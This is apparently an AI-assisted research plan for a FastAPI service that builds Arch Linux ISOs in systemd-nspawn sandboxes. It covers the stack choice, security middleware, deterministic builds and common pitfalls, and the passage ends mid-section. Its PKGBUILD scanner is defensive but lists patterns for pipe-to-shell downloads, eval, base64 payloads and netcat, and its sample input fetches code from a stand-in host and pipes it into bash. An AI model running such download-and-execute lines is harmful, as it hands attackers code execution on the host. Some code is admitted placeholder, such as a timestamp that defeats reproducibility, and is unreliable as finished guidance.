
Phase 1: Core Infrastructure & Security - Research

Researched: 2026-01-25
Domain: Production backend infrastructure with security-hardened build environment
Confidence: HIGH

Summary

Phase 1 establishes the foundation for a secure, production-ready Linux distribution builder platform. The core challenge is building a FastAPI backend that serves user requests quickly (<200ms p95 latency) while orchestrating potentially dangerous ISO builds in isolated sandboxes. The critical security requirement is preventing malicious user-submitted packages from compromising the build infrastructure—a real threat evidenced by the July 2025 CHAOS RAT malware distributed through AUR packages.

The standard approach for 2026 combines proven technologies: FastAPI for async API performance, PostgreSQL 18 for data persistence, Caddy for automatic HTTPS, and systemd-nspawn for build sandboxing. The deterministic build requirement (same configuration → identical ISO hash) demands careful environment control using SOURCE_DATE_EPOCH and fixed locales. This phase must implement security-first architecture because retrofitting sandboxing and reproducibility is nearly impossible.

Primary recommendation: Implement systemd-nspawn sandboxing with network whitelisting from day one, use SOURCE_DATE_EPOCH for deterministic builds, and configure FastAPI with production-grade security middleware (rate limiting, CSRF protection) before handling user traffic.

Standard Stack

Core Infrastructure

| Library | Version | Purpose | Why Standard |
|---|---|---|---|
| FastAPI | 0.128.0+ | Async web framework | Industry standard for Python APIs; roughly 3x the throughput of sync frameworks for I/O-bound operations. Native async/await, Pydantic validation, auto-generated OpenAPI docs. |
| Uvicorn | 0.30+ | ASGI server | Production-grade async server. Recent versions include a built-in multi-process supervisor (--workers N), removing the need for Gunicorn as a process manager. |
| PostgreSQL | 18.1+ | Primary database | Latest major release (Nov 2025); PG 13 is EOL. Async support via asyncpg. ACID guarantees for configuration versioning. |
| asyncpg | 0.28.x | PostgreSQL driver | High-performance async Postgres driver, 3-5x faster than psycopg2 in benchmarks. Note: pin <0.29.0 to avoid SQLAlchemy 2.0.x compatibility issues. |
| SQLAlchemy | 2.0+ | ORM & query builder | Async support via create_async_engine. Superior type hints in 2.0. Use AsyncAdaptedQueuePool for connection pooling. |
| Alembic | Latest | Database migrations | Official SQLAlchemy migration tool. Essential for schema evolution without downtime. |

Security & Infrastructure

| Library | Version | Purpose | Why Standard |
|---|---|---|---|
| Caddy | 2.x+ | Reverse proxy | Automatic HTTPS via Let's Encrypt. REST API for dynamic route management (critical for ISO download endpoints). Simpler than Nginx for programmatic configuration. |
| systemd-nspawn | Latest | Build sandbox | Lightweight container for process isolation. Namespace-based security: read-only /sys, /proc/sys. Network isolation via --private-network. |
| Pydantic | 2.12.5+ | Data validation | Required by FastAPI (>=2.7.0). V1 is deprecated. V2 offers better build-time performance and type safety. |
| pydantic-settings | Latest | Config management | Load configuration from environment variables with type validation. Never commit secrets. |

Security Middleware

| Library | Version | Purpose | When to Use |
|---|---|---|---|
| slowapi | Latest | Rate limiting | Redis-backed rate limiter. Prevents API abuse. Apply per-IP for anonymous traffic, per-user for authenticated. |
| fastapi-csrf-protect | Latest | CSRF protection | Double Submit Cookie pattern. Essential for form submissions. Combine with strict CORS for API-only endpoints. |
| python-multipart | Latest | Form parsing | Required for CSRF token handling in form data. FastAPI dependency for file uploads. |

Development Tools

| Library | Version | Purpose | When to Use |
|---|---|---|---|
| Ruff | Latest | Linter & formatter | Replaces Black, isort, flake8. Rust-based, blazing fast. Zero config needed. Constraint: use ruff, NOT black/flake8/isort. |
| mypy | Latest | Type checker | Static type checking. Essential with Pydantic and FastAPI. Strict mode recommended. |
| pytest | Latest | Testing framework | Async support via pytest-asyncio. Industry standard. |
| httpx | Latest | HTTP client | Async HTTP client for testing FastAPI endpoints. |

Installation

# Install uv (package manager)
curl -LsSf https://astral.sh/uv/install.sh | sh

# Create virtual environment
uv venv
source .venv/bin/activate

# Core dependencies
# Core dependencies (quote specs containing [], <, or >= so the shell
# does not glob or treat them as redirections)
uv pip install \
  "fastapi[all]==0.128.0" \
  "uvicorn[standard]>=0.30.0" \
  "sqlalchemy[asyncio]>=2.0.0" \
  "asyncpg<0.29.0" \
  alembic \
  "pydantic>=2.12.0" \
  pydantic-settings \
  slowapi \
  fastapi-csrf-protect \
  python-multipart

# Development dependencies (uv pip install has no -D flag; dev tools go
# into the same venv, or into a dependency group in pyproject.toml)
uv pip install \
  pytest \
  pytest-asyncio \
  pytest-cov \
  httpx \
  ruff \
  mypy

Architecture Patterns

backend/
├── app/
│   ├── api/
│   │   ├── v1/
│   │   │   ├── endpoints/
│   │   │   │   ├── auth.py
│   │   │   │   ├── builds.py
│   │   │   │   └── health.py
│   │   │   └── router.py
│   │   └── deps.py          # Dependency injection
│   ├── core/
│   │   ├── config.py         # pydantic-settings configuration
│   │   ├── security.py       # Auth, CSRF, rate limiting
│   │   └── db.py            # Database session management
│   ├── db/
│   │   ├── base.py          # SQLAlchemy Base
│   │   ├── models/          # Database models
│   │   └── session.py       # AsyncSession factory
│   ├── schemas/             # Pydantic request/response models
│   ├── services/            # Business logic
│   │   └── build.py         # Build orchestration (Phase 1: stub)
│   └── main.py
├── alembic/                 # Database migrations
│   ├── versions/
│   └── env.py
├── tests/
│   ├── api/
│   ├── unit/
│   └── conftest.py
├── Dockerfile
├── pyproject.toml
└── alembic.ini

Pattern 1: Async Database Session Management

What: Create async database sessions per request with proper cleanup.

When to use: Every FastAPI endpoint that queries PostgreSQL.

Example:

# app/core/db.py
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine, async_sessionmaker
from pydantic_settings import BaseSettings

class Settings(BaseSettings):
    database_url: str
    pool_size: int = 10
    max_overflow: int = 20
    pool_timeout: int = 30
    pool_recycle: int = 1800  # 30 minutes

settings = Settings()

# Create async engine with connection pooling
engine = create_async_engine(
    settings.database_url,
    pool_size=settings.pool_size,
    max_overflow=settings.max_overflow,
    pool_timeout=settings.pool_timeout,
    pool_recycle=settings.pool_recycle,
    pool_pre_ping=True,  # Validate connections before use
    echo=False  # Set True for SQL logging in dev
)

# Session factory
async_session_maker = async_sessionmaker(
    engine,
    class_=AsyncSession,
    expire_on_commit=False
)

# Dependency for FastAPI
async def get_db() -> AsyncSession:
    async with async_session_maker() as session:
        yield session

Source: Building High-Performance Async APIs with FastAPI, SQLAlchemy 2.0, and Asyncpg

Pattern 2: Caddy Automatic HTTPS Configuration

What: Configure Caddy as reverse proxy with automatic Let's Encrypt certificates.

When to use: Production deployment requiring HTTPS without manual certificate management.

Example:

# Caddyfile
{
    # Admin API for programmatic route management (localhost only)
    admin localhost:2019
}

# Automatic HTTPS for domain
api.debate.example.com {
    reverse_proxy localhost:8000 {
        # Health check
        health_uri /health
        health_interval 10s
        health_timeout 5s
    }

    # Security headers
    header {
        Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
        X-Content-Type-Options "nosniff"
        X-Frame-Options "DENY"
        X-XSS-Protection "1; mode=block"
    }

    # Rate limiting (requires caddy-rate-limit plugin)
    rate_limit {
        zone static {
            key {remote_host}
            events 100
            window 1m
        }
    }

    # Logging
    log {
        output file /var/log/caddy/access.log
        format json
    }
}

Programmatic route management (Python):

import httpx

async def add_iso_download_route(build_id: str, iso_path: str):
    """Dynamically add download route via Caddy API."""
    config = {
        "match": [{"path": [f"/download/{build_id}/*"]}],
        "handle": [{
            "handler": "file_server",
            "root": iso_path,
            "hide": [".git"]
        }]
    }

    async with httpx.AsyncClient() as client:
        response = await client.post(
            "http://localhost:2019/config/apps/http/servers/srv0/routes",
            json=config
        )
        response.raise_for_status()

Source: Caddy Reverse Proxy Documentation, Caddy 2 config for FastAPI

Pattern 3: FastAPI Security Middleware Stack

What: Layer security middleware in correct order for defense-in-depth.

When to use: All production FastAPI applications.

Example:

# app/main.py
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.util import get_remote_address
from slowapi.errors import RateLimitExceeded

from app.core.config import settings
from app.api.v1.router import api_router

# Rate limiter
limiter = Limiter(key_func=get_remote_address, default_limits=["100/minute"])

# FastAPI app
app = FastAPI(
    title="Debate API",
    version="1.0.0",
    docs_url="/docs" if settings.environment == "development" else None,
    redoc_url="/redoc" if settings.environment == "development" else None,
    debug=settings.debug
)

# Middleware order matters - Starlette treats the LAST middleware added as
# the outermost layer, so CORS (added second below) wraps TrustedHostMiddleware
# 1. Trusted Host (reject requests with invalid Host header)
app.add_middleware(
    TrustedHostMiddleware,
    allowed_hosts=settings.allowed_hosts  # ["api.debate.example.com", "localhost"]
)

# 2. CORS (handle cross-origin requests)
app.add_middleware(
    CORSMiddleware,
    allow_origins=settings.allowed_origins,
    allow_credentials=True,
    allow_methods=["GET", "POST", "PUT", "DELETE"],
    allow_headers=["*"],
    max_age=600  # Cache preflight requests for 10 minutes
)

# 3. Rate limiting
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)

# Include routers
app.include_router(api_router, prefix="/api/v1")

# Health check (no auth, no rate limit)
@app.get("/health")
async def health():
    return {"status": "healthy"}

CSRF Protection (separate from middleware, applied to specific endpoints):

# app/core/security.py
from fastapi_csrf_protect import CsrfProtect
from pydantic import BaseModel

class CsrfSettings(BaseModel):
    secret_key: str = settings.csrf_secret_key
    cookie_samesite: str = "lax"
    cookie_secure: bool = True  # HTTPS only
    cookie_domain: str = settings.cookie_domain

@CsrfProtect.load_config
def get_csrf_config():
    return CsrfSettings()

# Apply to form endpoints
from fastapi import Depends, Request
from fastapi_csrf_protect import CsrfProtect

@app.post("/api/v1/builds")
async def create_build(
    request: Request,
    csrf_protect: CsrfProtect = Depends(),
    db: AsyncSession = Depends(get_db)
):
    await csrf_protect.validate_csrf(request)  # Raises 403 if token missing/invalid
    # ... build logic

Source: FastAPI Security Guide, FastAPI CSRF Protection

Pattern 4: systemd-nspawn Build Sandbox

What: Isolate archiso builds in systemd-nspawn containers with network whitelisting.

When to use: Every ISO build to prevent malicious packages from compromising host.

Example:

# app/services/sandbox.py
import subprocess
from pathlib import Path
from typing import List

class BuildSandbox:
    """Manages systemd-nspawn sandboxed build environments."""

    def __init__(self, container_root: Path, allowed_mirrors: List[str]):
        self.container_root = container_root
        self.allowed_mirrors = allowed_mirrors

    async def create_container(self, build_id: str) -> Path:
        """Create isolated container for build."""
        container_path = self.container_root / build_id
        container_path.mkdir(parents=True, exist_ok=True)

        # Bootstrap minimal Arch Linux environment (blocking call; in
        # production wrap in asyncio.to_thread so the event loop stays free)
        subprocess.run([
            "pacstrap",
            "-c",  # Use package cache
            "-G",  # Avoid copying host pacman keyring
            "-M",  # Avoid copying host mirrorlist
            str(container_path),
            "base",
            "archiso"
        ], check=True)

        # Configure mirrors (whitelist only)
        mirrorlist_path = container_path / "etc/pacman.d/mirrorlist"
        mirrorlist_path.write_text("\n".join([
            f"Server = {mirror}" for mirror in self.allowed_mirrors
        ]))

        return container_path

    async def run_build(
        self,
        container_path: Path,
        profile_path: Path,
        output_path: Path
    ) -> subprocess.CompletedProcess:
        """Execute archiso build in sandboxed container."""

        # systemd-nspawn arguments for security
        nspawn_cmd = [
            "systemd-nspawn",
            "--directory", str(container_path),
            "--private-network",  # No network access (mirrors pre-cached)
            "--read-only",  # Immutable root filesystem
            "--tmpfs", "/tmp:mode=1777",  # Writable tmp
            "--tmpfs", "/var/tmp:mode=1777",
            "--bind", f"{profile_path}:/build/profile:ro",  # Profile read-only
            "--bind", f"{output_path}:/build/output",  # Output writable
            "--setenv", f"SOURCE_DATE_EPOCH={self._get_source_date_epoch()}",
            "--setenv", "LC_ALL=C",  # Fixed locale for determinism
            "--setenv", "TZ=UTC",  # Fixed timezone
            "--capability", "CAP_SYS_ADMIN",  # Required for mkarchiso
            "--console=pipe",  # Capture output
            "--quiet",
            "--",
            "mkarchiso",
            "-v",
            "-r",  # Remove working directory after build
            "-w", "/tmp/archiso-work",
            "-o", "/build/output",
            "/build/profile"
        ]

        # Execute with timeout (blocking call; wrap in asyncio.to_thread in
        # production so the event loop stays responsive)
        result = subprocess.run(
            nspawn_cmd,
            timeout=900,  # 15 minute timeout (INFR-02 requirement)
            capture_output=True,
            text=True
        )

        return result

    def _get_source_date_epoch(self) -> str:
        """Return timestamp for reproducible builds."""
        # NOTE: current time is a placeholder that defeats cross-run
        # reproducibility; Phase 2 will derive this from the configuration's
        # git commit timestamp so identical configs share an epoch.
        import time
        return str(int(time.time()))

    async def cleanup_container(self, container_path: Path):
        """Remove container after build."""
        import shutil
        shutil.rmtree(container_path)

Network isolation with allowed mirrors:

For Phase 1, pre-cache packages in the container bootstrap phase. Future enhancement: use --network-macvlan with iptables whitelist rules.

Source: systemd-nspawn ArchWiki, Lightweight Development Sandboxes with systemd-nspawn

Pattern 5: Deterministic Build Configuration

What: Configure build environment for reproducible outputs (same config → identical hash).

When to use: Every ISO build to enable caching and integrity verification.

Example:

# app/services/deterministic.py
import hashlib
import json
from pathlib import Path
from typing import Dict, Any

class DeterministicBuildConfig:
    """Ensures reproducible ISO builds."""

    @staticmethod
    def compute_config_hash(config: Dict[str, Any]) -> str:
        """
        Generate deterministic hash of build configuration.
        Critical: Same config must produce same hash for caching.
        """
        # Normalize configuration (sorted keys, consistent formatting)
        normalized = {
            "packages": sorted(config.get("packages", [])),
            "overlays": sorted([
                {
                    "name": overlay["name"],
                    "files": sorted([
                        {
                            "path": f["path"],
                            "content_hash": hashlib.sha256(
                                f["content"].encode()
                            ).hexdigest()
                        }
                        for f in sorted(overlay.get("files", []), key=lambda x: x["path"])
                    ], key=lambda x: x["path"])
                }
                for overlay in sorted(config.get("overlays", []), key=lambda x: x["name"])
            ], key=lambda x: x["name"]),
            "locale": config.get("locale", "en_US.UTF-8"),
            "timezone": config.get("timezone", "UTC")
        }

        # JSON with sorted keys for determinism
        config_json = json.dumps(normalized, sort_keys=True)
        return hashlib.sha256(config_json.encode()).hexdigest()

    @staticmethod
    def create_archiso_profile(
        config: Dict[str, Any],
        profile_path: Path,
        source_date_epoch: int
    ):
        """
        Generate archiso profile with deterministic settings.

        Key determinism factors:
        - SOURCE_DATE_EPOCH: Fixed timestamps in filesystem
        - LC_ALL=C: Fixed locale for sorting
        - TZ=UTC: Fixed timezone
        - Sorted package lists
        - Fixed compression settings
        """
        profile_path.mkdir(parents=True, exist_ok=True)

        # packages.x86_64 (sorted for determinism)
        packages_file = profile_path / "packages.x86_64"
        packages = sorted(config.get("packages", []))
        packages_file.write_text("\n".join(packages) + "\n")

        # profiledef.sh
        profiledef = profile_path / "profiledef.sh"
        profiledef.write_text(f"""#!/usr/bin/env bash
# Deterministic archiso profile

iso_name="debate-custom"
iso_label="DEBATE_$(date --date=@{source_date_epoch} +%Y%m)"
iso_publisher="Debate Platform <https://debate.example.com>"
iso_application="Debate Custom Linux"
iso_version="$(date --date=@{source_date_epoch} +%Y.%m.%d)"
install_dir="arch"
bootmodes=('bios.syslinux.mbr' 'bios.syslinux.eltorito' 'uefi-x64.systemd-boot.esp' 'uefi-x64.systemd-boot.eltorito')
arch="x86_64"
pacman_conf="pacman.conf"
airootfs_image_type="squashfs"
airootfs_image_tool_options=('-comp' 'xz' '-Xbcj' 'x86' '-b' '1M' '-Xdict-size' '1M')

# Deterministic file permissions
file_permissions=(
  ["/etc/shadow"]="0:0:0400"
  ["/root"]="0:0:750"
  ["/etc/gshadow"]="0:0:0400"
)
""")

        # pacman.conf (use fixed mirrors)
        pacman_conf = profile_path / "pacman.conf"
        pacman_conf.write_text("""
[options]
Architecture = auto
CheckSpace
SigLevel = Required DatabaseOptional
LocalFileSigLevel = Optional

[core]
Include = /etc/pacman.d/mirrorlist

[extra]
Include = /etc/pacman.d/mirrorlist
""")

        # airootfs structure
        airootfs = profile_path / "airootfs"
        airootfs.mkdir(exist_ok=True)

        # Apply overlay files
        for overlay in config.get("overlays", []):
            for file_config in overlay.get("files", []):
                file_path = airootfs / file_config["path"].lstrip("/")
                file_path.parent.mkdir(parents=True, exist_ok=True)
                file_path.write_text(file_config["content"])

Source: archiso deterministic builds merge request, SOURCE_DATE_EPOCH specification
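The caching property of compute_config_hash (same set of inputs, regardless of order, yields the same hash) can be sanity-checked with a standalone snippet. This condenses the normalization above to the package list for brevity; the same sorted-inputs + json.dumps(sort_keys=True) + sha256 recipe applies to overlays.

```python
# Minimal order-independence check for the config-hash normalization:
# sort inputs, serialize with sorted keys, then hash.
import hashlib
import json


def config_hash(config: dict) -> str:
    normalized = {
        "packages": sorted(config.get("packages", [])),
        "locale": config.get("locale", "en_US.UTF-8"),
        "timezone": config.get("timezone", "UTC"),
    }
    return hashlib.sha256(
        json.dumps(normalized, sort_keys=True).encode()
    ).hexdigest()


a = config_hash({"packages": ["vim", "base", "networkmanager"]})
b = config_hash({"packages": ["networkmanager", "base", "vim"]})
assert a == b  # same package set, different order -> identical cache key
```

Any field added to the configuration later must go through the same normalization, or previously cached hashes silently stop matching.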

Don't Hand-Roll

These problems already have battle-tested solutions:

| Problem | Don't Build | Use Instead | Why |
|---|---|---|---|
| HTTPS certificate management | Custom Let's Encrypt client | Caddy with automatic HTTPS | Certificate renewal, OCSP stapling, HTTP challenge handling. Caddy handles all edge cases. |
| API rate limiting | Token bucket from scratch | slowapi or fastapi-limiter | Distributed rate limiting across workers, Redis backend, bypass for trusted IPs, multiple rate limit tiers. |
| CSRF protection | Custom token generation | fastapi-csrf-protect | Double Submit Cookie pattern, token rotation, SameSite cookie handling, timing-attack prevention. |
| Database connection pooling | Manual connection management | SQLAlchemy AsyncAdaptedQueuePool | Connection health checks, overflow handling, timeout management, prepared statement caching. |
| Container isolation | chroot or custom namespaces | systemd-nspawn | Namespace isolation, cgroup resource limits, capability dropping, read-only filesystem enforcement. |
| Async database drivers | Synchronous psycopg2 with thread pool | asyncpg | Native async protocol, connection pooling, prepared statements, type inference, 3-5x faster. |

Key insight: Security and infrastructure code has subtle failure modes that only surface under load or attack. Use proven libraries with years of production hardening.

Common Pitfalls

Pitfall 1: Unsandboxed Build Execution (CRITICAL)

What goes wrong: User-submitted packages execute arbitrary code during build with full system privileges, allowing compromise of build infrastructure.

Why it happens: Developers assume package builds are safe or underestimate risk. archiso's mkarchiso runs without sandboxing by default.

Real-world incident: July 2025 CHAOS RAT malware distributed through AUR packages (librewolf-fix-bin, firefox-patch-bin) using .install scripts to execute remote code.

How to avoid:

  • NEVER run archiso builds directly on host system
  • Use systemd-nspawn with --private-network and --read-only flags
  • Run builds in ephemeral containers (destroy after completion)
  • Implement network egress filtering (whitelist official Arch mirrors only)
  • Static analysis on PKGBUILD files: detect curl | bash, eval, base64 encoding
  • Monitor build processes for unexpected network connections
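The static-analysis bullet above can start as a simple pattern scan over submitted PKGBUILDs. This is a sketch only: the red-flag list is illustrative and far from exhaustive, and a real scanner would also inspect .install files and source arrays.

```python
# Sketch of a PKGBUILD red-flag scanner for the static-analysis step above.
# The pattern list is illustrative, not exhaustive.
import re

RED_FLAGS = [
    (r"curl[^|\n]*\|\s*(ba)?sh", "pipe-to-shell download"),
    (r"\beval\b", "eval of dynamic code"),
    (r"base64\s+(-d|--decode)", "base64-decoded payload"),
    (r"\bnc\b|\bncat\b", "raw netcat usage"),
]


def scan_pkgbuild(text: str) -> list[str]:
    """Return descriptions of suspicious patterns found in PKGBUILD text."""
    return [desc for pattern, desc in RED_FLAGS if re.search(pattern, text)]


findings = scan_pkgbuild('prepare() {\n  curl -s https://evil.example/x | bash\n}')
```

A non-empty result would flag the build for manual review rather than reject it outright, since legitimate PKGBUILDs occasionally match broad patterns.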

Warning signs:

  • Build makes outbound connections to non-mirror IPs
  • PKGBUILD contains base64 encoding or eval statements
  • Build duration significantly longer than expected
  • Unexpected filesystem modifications outside working directory

Phase to address: Phase 1 - Build sandboxing must be architected from the start. Retrofitting is nearly impossible.

Pitfall 2: Non-Deterministic Builds

What goes wrong: Same configuration generates different ISO hashes, breaking caching and integrity verification.

Why it happens: Timestamps in artifacts, non-deterministic file ordering, leaked environment variables, parallel build race conditions.

How to avoid:

  • Set SOURCE_DATE_EPOCH environment variable for all builds
  • Use LC_ALL=C for consistent sorting and locale
  • Set TZ=UTC for timezone consistency
  • Sort all input lists (packages, files) before processing
  • Use fixed compression settings in archiso profile
  • Pin archiso version (don't use rolling latest)
  • Test: build same config twice, compare SHA256 hashes
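The double-build test in the last bullet can be scripted as a checksum comparison. The ISO paths in the usage line are placeholders for two runs of the same configuration; only the comparison logic is shown here.

```shell
#!/usr/bin/env bash
# Compare checksums of two build outputs; identical hashes indicate the
# pipeline is deterministic for that configuration.
compare_iso_hashes() {
    local a="$1" b="$2"
    local ha hb
    ha=$(sha256sum "$a" | awk '{print $1}')
    hb=$(sha256sum "$b" | awk '{print $1}')
    if [ "$ha" = "$hb" ]; then
        echo "DETERMINISTIC $ha"
    else
        echo "NON-DETERMINISTIC $ha $hb"
        return 1
    fi
}

# Usage (paths are placeholders for two runs of the same config):
# compare_iso_hashes out1/custom.iso out2/custom.iso
```

Wiring this into CI as a nightly job catches determinism regressions before they silently disable the build cache.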

Detection:

  • Automated testing: duplicate builds with checksum comparison
  • Monitor cache hit rate (sudden drops indicate non-determinism)
  • Track build output size variance for identical configs

Phase to address: Phase 1 - Reproducibility must be designed into build pipeline from start.

Source: Reproducible builds documentation

Pitfall 3: Connection Pool Exhaustion

What goes wrong: Under load, API exhausts PostgreSQL connections. New requests fail with "connection pool timeout" errors.

Why it happens: Default pool_size (5) too small for async workloads. Not using pool_pre_ping to detect stale connections. Long-running queries hold connections.

How to avoid:

  • Set pool_size=10, max_overflow=20 for production
  • Enable pool_pre_ping=True to validate connections
  • Set pool_recycle=1800 (30 min) to refresh connections
  • Use pool_timeout=30 to fail fast
  • Pin asyncpg<0.29.0 to avoid SQLAlchemy 2.0.x compatibility issues
  • Monitor connection pool metrics (active, idle, overflow)
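The settings above translate into a concrete PostgreSQL capacity requirement, because each worker process holds its own pool. The worker count below is an assumed example value, not a recommendation from this document.

```python
# Worked example: pool settings vs PostgreSQL max_connections.
# Total possible connections = workers * (pool_size + max_overflow).
pool_size = 10
max_overflow = 20
workers = 4  # assumed, e.g. uvicorn --workers 4

peak_per_worker = pool_size + max_overflow  # 30 connections per worker
peak_total = workers * peak_per_worker      # 120 connections total

# PostgreSQL ships with max_connections = 100 by default, so four workers
# at these settings can exceed it; raise max_connections or front the
# database with a pooler such as pgbouncer.
print(peak_per_worker, peak_total)
```

Running the arithmetic before deployment avoids discovering the limit as "connection pool timeout" errors under load.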

Detection:

  • Alert on "connection pool timeout" errors
  • Monitor connection pool utilization (should stay <80%)
  • Track query duration p95 (detect slow queries holding connections)

Phase to address: Phase 1 - Configure properly during initial database setup.

Source: Handling PostgreSQL Connection Limits in FastAPI

Pitfall 4: Interactive Docs Left Enabled in Production

What goes wrong: Developers leave /docs and /redoc enabled in production, exposing API schema to attackers.

Why it happens: Convenient during development, forgotten in production. No environment-based toggle.

How to avoid:

  • Disable docs in production: docs_url=None if settings.environment == "production" else "/docs"
  • Or require authentication for docs endpoints
  • Use environment variables to control feature flags

Detection:

  • Security audit: check if /docs accessible without auth in production

Phase to address: Phase 1 - Configure during initial FastAPI setup.

Source: FastAPI Production Checklist

Pitfall 5: Insecure Default Secrets

What goes wrong: Using hardcoded or weak secrets for JWT signing, CSRF tokens, or database passwords. Attackers exploit to forge tokens or access database.

Why it happens: Copy-paste from tutorials. Not using environment variables. Committing .env files.

How to avoid:

  • Generate strong secrets: openssl rand -hex 32
  • Load from environment variables via pydantic-settings
  • NEVER commit secrets to git
  • Use secret management services (AWS Secrets Manager, HashiCorp Vault) in production
  • Rotate secrets periodically
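The openssl command above has a stdlib equivalent when secrets are generated from Python, for example in a bootstrap or key-rotation script:

```python
# Python equivalent of `openssl rand -hex 32`: a 256-bit secret rendered
# as 64 hex characters, suitable for CSRF or JWT signing keys.
import secrets


def generate_secret() -> str:
    return secrets.token_hex(32)  # 32 cryptographically random bytes


key = generate_secret()
```

The secrets module draws from the OS CSPRNG; never substitute the random module, whose output is predictable.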

Detection:

  • Git pre-commit hook: scan for hardcoded secrets
  • Security audit: check for weak or default credentials

Phase to address: Phase 1 - Establish secure configuration management from start.

Source: FastAPI Security FAQs

Code Examples

Database Migrations with Alembic

# Initialize Alembic
alembic init alembic

# Create first migration
alembic revision --autogenerate -m "Create initial tables"

# Apply migrations
alembic upgrade head

# Rollback
alembic downgrade -1

Alembic env.py configuration for async:

# alembic/env.py
from logging.config import fileConfig
from sqlalchemy import pool
from sqlalchemy.ext.asyncio import async_engine_from_config
from alembic import context

from app.core.config import settings
from app.db.base import Base  # Import all models

config = context.config
config.set_main_option("sqlalchemy.url", settings.database_url)

target_metadata = Base.metadata

def run_migrations_offline():
    """Run migrations in 'offline' mode."""
    context.configure(
        url=settings.database_url,
        target_metadata=target_metadata,
        literal_binds=True,
        dialect_opts={"paramstyle": "named"},
    )

    with context.begin_transaction():
        context.run_migrations()

async def run_migrations_online():
    """Run migrations in 'online' mode."""
    connectable = async_engine_from_config(
        config.get_section(config.config_ini_section),
        prefix="sqlalchemy.",
        poolclass=pool.NullPool,
    )

    async with connectable.connect() as connection:
        await connection.run_sync(do_run_migrations)

    await connectable.dispose()

def do_run_migrations(connection):
    context.configure(connection=connection, target_metadata=target_metadata)
    with context.begin_transaction():
        context.run_migrations()

if context.is_offline_mode():
    run_migrations_offline()
else:
    import asyncio
    asyncio.run(run_migrations_online())

Source: FastAPI with Async SQLAlchemy and Alembic

PostgreSQL Backup Script

#!/bin/bash
# Daily PostgreSQL backup with retention

BACKUP_DIR="/var/backups/postgres"
RETENTION_DAYS=30
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
DB_NAME="debate"

# Create backup directory
mkdir -p "$BACKUP_DIR"

# Backup database
pg_dump -U postgres -Fc -b -v -f "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump" "$DB_NAME"

# Compress backup (-Fc dumps are already compressed; gzip mainly provides
# a uniform *.gz naming scheme for the retention sweep below)
gzip "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump"

# Delete old backups
find "$BACKUP_DIR" -name "${DB_NAME}_*.dump.gz" -mtime +$RETENTION_DAYS -delete

# Verify backup integrity
gunzip -t "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz" && echo "Backup verified"

# Test restore (weekly) - pg_restore cannot read gzipped dumps directly,
# so stream through gunzip
if [ "$(date +%u)" -eq 1 ]; then
    echo "Testing weekly restore..."
    createdb -U postgres "${DB_NAME}_test"
    gunzip -c "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz" | \
        pg_restore -U postgres -d "${DB_NAME}_test"
    dropdb -U postgres "${DB_NAME}_test"
fi

Cron schedule:

# Daily backup at 2 AM
0 2 * * * /usr/local/bin/postgres-backup.sh >> /var/log/postgres-backup.log 2>&1

Source: PostgreSQL Backup Best Practices

Health Check Endpoint

# app/api/v1/endpoints/health.py
from fastapi import APIRouter, Depends
from fastapi.responses import JSONResponse
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import text

from app.core.db import get_db

router = APIRouter()

@router.get("/health")
async def health_check():
    """Basic health check (no database)."""
    return {"status": "healthy"}

@router.get("/health/db")
async def health_check_db(db: AsyncSession = Depends(get_db)):
    """Health check with database connection test."""
    try:
        result = await db.execute(text("SELECT 1"))
        result.scalar()
        return {"status": "healthy", "database": "connected"}
    except Exception as e:
        # Return 503 so load balancers mark the instance unhealthy
        return JSONResponse(
            status_code=503,
            content={"status": "unhealthy", "database": "error", "error": str(e)},
        )

State of the Art

| Old Approach | Current Approach (2026) | When Changed | Impact |
|---|---|---|---|
| Gunicorn + Uvicorn workers | Uvicorn --workers flag | Uvicorn 0.30 (2024) | Simpler deployment, one less dependency |
| psycopg2 (sync) | asyncpg | SQLAlchemy 2.0 (2023) | 3-5x faster, native async, better type hints |
| Pydantic v1 | Pydantic v2 | Pydantic 2.0 (2023) | Better performance, Python 3.14 compatibility |
| chroot for isolation | systemd-nspawn | ~2015 | Full namespace isolation, cgroup limits |
| Manual Let's Encrypt | Caddy automatic HTTPS | Caddy 2.0 (2020) | Zero-config certificates, automatic renewal |
| Nginx config files | Caddy REST API | Caddy 2.0 (2020) | Programmatic route management |
| asyncpg 0.29+ | Pin asyncpg <0.29.0 | 2024 | SQLAlchemy 2.0.x compatibility issues |

Deprecated/outdated:

  • Gunicorn as ASGI manager: Uvicorn 0.30+ has built-in multi-process supervisor
  • Pydantic v1: Deprecated, Python 3.14+ incompatible
  • psycopg2 for async FastAPI: Use asyncpg for 3-5x performance improvement
  • chroot for sandboxing: Insufficient isolation; use systemd-nspawn or containers

Open Questions

1. Network Isolation Strategy for systemd-nspawn

What we know:

  • systemd-nspawn --private-network completely isolates container from network
  • archiso mkarchiso needs to download packages from mirrors
  • User overlays may reference external packages (SSH keys, configs fetched from GitHub)

What's unclear:

  • Best approach for whitelisting Arch mirrors while blocking other network access
  • Whether to pre-cache all packages (slow bootstrap, guaranteed isolation) vs. allow outbound to whitelisted mirrors (faster, more complex)
  • How to handle private overlays requiring external resources

Recommendation:

  • Phase 1: Pre-cache packages during container bootstrap. Use --private-network for complete isolation.
  • Future enhancement: Implement HTTP proxy with whitelist, use --network-macvlan with iptables rules

Confidence: MEDIUM - No documented pattern for systemd-nspawn + selective network access

2. Build Timeout Threshold

What we know:

  • INFR-02 requirement: ISO build completes within 15 minutes
  • Context decision: Claude's discretion on timeout handling (soft warning vs hard kill, duration)

What's unclear:

  • What percentage of builds complete within 15 minutes vs. require longer?
  • Should timeout be configurable per build size (small overlay vs. full desktop environment)?
  • Soft warning (allow continuation with user consent) vs. hard kill?

Recommendation:

  • Phase 1: Hard timeout at 20 minutes (133% of target) with warning at 15 minutes
  • Phase 2: Collect metrics, tune threshold based on actual build distribution
  • Allow extended timeout for authenticated users or specific overlay combinations

Confidence: LOW - Depends on real-world build performance data

3. Cache Invalidation Strategy

What we know:

  • Deterministic builds enable caching (same config → same hash)
